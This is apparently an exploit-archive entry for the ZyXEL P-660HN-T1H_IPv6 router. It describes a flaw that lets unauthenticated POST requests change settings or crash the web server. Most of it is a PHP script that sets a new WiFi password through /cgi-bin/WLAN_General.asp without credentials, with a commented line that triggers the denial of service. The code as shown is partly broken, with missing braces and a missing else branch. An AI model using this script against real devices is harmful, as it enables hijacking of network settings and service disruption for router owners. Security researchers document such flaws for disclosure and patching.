ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service

Koorosh Ghorbani 23.04.2015 Verified Wait
Denial of Service Exploits Hardware

Exploit Code

Exploit Title   : ZYXEL remote configuration editor / Web Server DoS
Date            : 23 April 2015
Exploit Author  : Koorosh Ghorbani
Site            : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform        : Hardware 
Tested On       : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)
 Unattended remote access  
ZYXEL Embedded Software does not check Cookies And Credentials on POST method so 
attackers could changes settings and view pages with post method .

      DoS Web Server
sending empty Post to admin pages will crash internal web server and router needs
to hard reset .

$banner = "   ___ _______ _     ____  _ _______ \r\n" . "  / _ \__   __| |   |  _ \(_)__   __|\r\n" ." | (_) | | |  | |__ | |_) |_   | |   \r\n" ."  > _ <  | |  | '_ \|  _ <| |  | |   \r\n" ." | (_) | | |  | | | | |_) | |  | |   \r\n" ."  \___/  |_|  |_| |_|____/|_|  |_|   \r\n" ."                                     \r\n" ."                                     \r\n";
print $banner;
function Post($packet,$host)
	try {
		$curl = curl_init();
		curl_setopt($curl, CURLOPT_URL, $host);
		curl_setopt($curl, CURLOPT_POST, 1);
		curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
		curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
		curl_setopt($curl, CURLOPT_REFERER, "Referer:");
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
		$result = curl_exec($curl);
		return $result;
	}catch (Exception $e ){
		echo $e->getMessage();
		return "" ;
if(sizeof($argv) < 3) {
	print "Usage : $argv[0] NewWifiPassword\n";
$host = $argv[1];
$password = urlencode($argv[2]);
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=" ;
$target = "http://$host/cgi-bin/WLAN_General.asp";
if(strlen(Post($packet,$target)) > 0){
    print "Seems Changed !";
    print "Humm , No Chance !";
//DoS : Post("",$target) ;